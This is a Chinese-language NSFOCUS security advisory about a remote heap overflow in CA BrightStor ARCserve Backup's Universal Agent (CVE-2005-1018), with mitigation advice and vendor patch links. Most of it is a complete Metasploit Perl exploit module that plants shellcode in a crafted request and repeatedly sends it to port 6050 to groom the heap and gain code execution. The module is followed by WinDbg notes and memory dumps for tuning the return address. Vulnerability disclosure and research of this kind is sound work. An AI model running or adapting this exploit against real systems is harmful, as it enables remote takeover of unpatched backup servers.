安全研究

安全漏洞
CA BrightStor ARCserve Backup UniversalAgent缓冲区溢出漏洞

发布日期:2005-04-12
更新日期:2005-04-12

受影响系统:
Computer Associates BrightStor ARCserve Backup v11 (Win32)
描述:
BUGTRAQ  ID: 13102
CVE(CAN) ID: CVE-2005-1018

BrightStor ARCserve Backup可为所有级别的Windows、NetWare、Linux和UNIX服务器及Windows、Mac OS X、Linux、UNIX、AS/400和VMS客户环境提供备份,恢复防护。

BrightStor软件实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在主机上执行任意指令。

BrightStor软件使用网络代理跨网络在节点上执行备份。如果在TCP端口上收到了option字段设置为0,3或1000的代理请求,且报文中该option字段前有个很大的字符串,则会发生溢出。远程攻击者可能利用这个漏洞在有漏洞的计算机上执行任意指令或导致拒绝服务的情况。

<*来源:iDEFENSE Labs (labs@idefense.com
  
  链接:*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::cabrightstor_uniagent;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {
    'Name'  => 'CA BrightStor Universal Agent Overflow',
    'Version'  => '$Revision: 1.13 $',
    'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],

    'Arch'  => [ 'x86' ],
    'OS'    => [ 'win32', 'win2000', 'winxp', 'win2003', 'winnt' ],
    'Priv'  => 1,

    'AutoOpts'  => { 'EXITFUNC' => 'process' },
    'UserOpts'  =>
      {
        'RHOST' => [1, 'ADDR', 'The target address'],
        'RPORT' => [1, 'PORT', 'The target port', 6050],
      },

    'Payload' =>
      {

        # 250 bytes of space (bytes 0xa5 -> 0xa8 = reversed)
        'Space'     => 164,
        'BadChars'  => "\x00",
        'Keys'      => ['+ws2ord'],
        'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
      },

    'Description'  => Pex::Text::Freeform(qq{
    This module exploits a convoluted heap overflow in the CA
    BrightStor Universal Agent service. Triple userland exception
    results in heap growth and execution of dereferenced function pointer
    at a specified address.
}),

    'Refs'    =>
      [
          ['OSVDB', '15471'],      
        ['MIL', '16'],
        ['URL', 'http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities'],
      ],

    'DefaultTarget'    => 0,
    'Targets' => [
        ['Magic Heap Target #1', 0x01625c44], # far away heap address
      ],

    'Keys'    => ['brightstor'],
  };

sub new {
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
    return($self);
}

sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_idx  = $self->GetVar('TARGET');
    my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
    my $target = $self->Targets->[$target_idx];

    $self->PrintLine("[*] Attempting to exploit target " . $target->[0]);

    # The server reverses four bytes starting at 0xa5
    # my $patchy = join('', reverse(split('',substr($shellcode, 0xa5, 4))));
    # substr($shellcode, 0xa5, 4, $patchy);

    # Create the request
    my $boom = "X" x 1024;

    # Required field to trigger the fault
    substr($boom, 248, 2, pack('v', 1000));

    # The shellcode, limited to 250 bytes (no nulls)
    substr($boom, 256, length($shellcode), $shellcode);

    # This should point to itself
    substr($boom, 576, 4, pack('V', $target->[1]));

    # This points to the code below
    substr($boom, 580, 4, pack('V', $target->[1]+8 ));

    # We have 95 bytes, use it to hop back to shellcode
    substr($boom, 584, 6, "\x68" . pack('V', $target->[1]-320) . "\xc3");

    # Stick the protocol header in front of our request
    $boom = "\x00\x00\x00\x00\x03\x20\xa8\x02".$boom;

    $self->PrintLine("[*] Sending " .length($boom) . " bytes to remote host.");

    # We keep making new connections and triggering the fault until
    # the heap is grown to encompass our known return address. Once
    # this address has been allocated and filled, each subsequent
    # request will result in our shellcode being executed.

    for (1 .. 200) {
        my $s = Msf::Socket::Tcp->new
          (
            'PeerAddr'  => $target_host,
            'PeerPort'  => $target_port,
          );

        if ($s->IsError) {
            $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
            return;
        }

        if ($_ % 10 == 0) {
            $self->PrintLine("[*] Sending request $_ of 200...");
        }

        $s->Send($boom);
        $s->Close;

        # Give the process time to recover from each exception
        select(undef, undef, undef, 0.1);
    }
    return;
}

1;

__END__
012a0d91 8b8e445c0000     mov     ecx,[esi+0x5c44]
012a0d97 83c404           add     esp,0x4
012a0d9a 85c9             test    ecx,ecx
012a0d9c 7407             jz      ntagent+0x20da5 (012a0da5)
012a0d9e 8b11             mov     edx,[ecx]         ds:0023:41327441=???????
012a0da0 6a01             push    0x1
012a0da2 ff5204           call    dword ptr [edx+0x4]

Each request will result in another chunk being allocated, the exception
causes these chunks to never be freed. The large chunk size allows us to
predict the location of our buffer and grow our buffer to where we need it.

If these addresses do not match up, run this exploit, then attach with WinDbg:

> s 0 Lfffffff 0x44 0x5c 0x61 0x01

Figure out the pattern, replace the return address, restart the service,
and run it through again. Only tested on WinXP SP1

011b5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011c5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011d5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011e5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011f5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01205c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01225c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01235c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01245c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01255c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01265c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01275c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01285c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01295c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
012a5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
012b5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
012c5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
012d5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
012e5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
012f5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01305c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01315c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01525c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01535c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01545c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01555c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01565c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01575c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01585c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01595c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
015a5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
015b5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
015c5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
015d5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
015e5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
015f5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01605c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01615c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01625c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01635c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01645c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01655c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01665c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01675c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01685c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01695c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016a5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016b5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016c5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016d5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01725c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
017e5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 部署防火墙,访问控制列表或其他TCP/UDP限制机制,限制对系统和服务的访问。

厂商补丁:

Computer Associates
-------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

BrightStor ARCserve Backup r11.1 for Windows (all components):
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66526&startsearch=1

BrightStor ARCserve Backup r11.1 Client Agent for Windows only:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66527&startsearch=1

BrightStor ARCserve Backup r11.1 for Windows - 64 bit edition:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66534&startsearch=1

BrightStor ARCserve Backup r11.0 for Windows:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66525&startsearch=1

BrightStor ARCserve Backup r11.0 for Windows - 64 bit edition:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66535&startsearch=1

BrightStor ARCserve Backup v9.01 for Windows English (all components):
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66528&startsearch=1

BrightStor ARCserve Backup v9.01 for Windows Non-English (all components):
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66529&startsearch=1

BrightStor ARCserve Backup v9.01 for Windows - 64 bit edition:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66536&startsearch=1

BrightStor ARCserve Backup v9.01 Client Agent for Windows only (English):
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66530&startsearch=1

BrightStor ARCserve Backup v9.01 Client Agent for Windows only (Non-English):
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66531&startsearch=1

BrightStor Enterprise Backup v10.5 for Windows:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66524&startsearch=1

BrightStor Enterprise Backup v10.5 for Windows - 64 bit edition:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66533&startsearch=1

BrightStor Enterprise Backup v10.0 for Windows:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66523&startsearch=1

浏览次数:3820
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障